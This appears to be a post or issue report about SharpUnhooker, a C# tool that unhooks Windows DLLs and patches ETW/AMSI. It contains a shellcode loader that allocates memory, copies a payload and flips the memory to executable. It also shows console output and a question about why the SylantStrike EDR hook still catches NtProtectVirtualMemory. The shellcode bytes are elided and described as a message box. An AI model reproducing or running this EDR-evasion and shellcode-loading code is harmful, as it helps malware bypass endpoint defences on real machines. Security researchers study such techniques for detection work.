public class SUUsageExample{
.....
public static void Main()
{
SharpUnhooker.Mein();
byte[] buf = new byte[285] { 0xfc,0x48,0x81,0xe4,0xf0,0....... }; // just message box
run(buf);
}
public static void run(byte[] ShellcodeBytes)
{
SharpUnhooker.Mein();
IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
IntPtr AllocationAddress = new IntPtr();
IntPtr ZeroBitsThatZero = IntPtr.Zero;
UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
Console.WriteLine("[*] Allocating memory...");
NtAllocateVirtualMemory(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
Console.WriteLine("[*] Copying Shellcode...");
Marshal.Copy(ShellcodeBytes, 0, AllocationAddress, ShellcodeBytes.Length);
Console.WriteLine("[*] Changing memory protection setting...");
UInt32 newProtect = 0;
Sleep(1000);
Console.WriteLine("[*] ...");
NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);
Console.WriteLine("[*] Passed...");
When hooking with SylantStrike on the process created with the above code, SylantStrike still detects the following call from NTDLL: NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);
ShellAnuuked.exe
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[ Written By GetRektBoy724 ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]
[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[ Written By GetRektBoy724 ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]
[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[*] Allocating memory...
[*] Copying Shellcode...
[*] Changing memory protection setting...
[*] ...
SylantStrikeInject.exe --dll=SylantStrike.dll --process=ShellAnuuked.exe
Waiting for process events
+ Listening for the following processes: shellanuuked.exe
Injecting process ShellAnuuked.exe(10520) with DLL SylantStrike.dll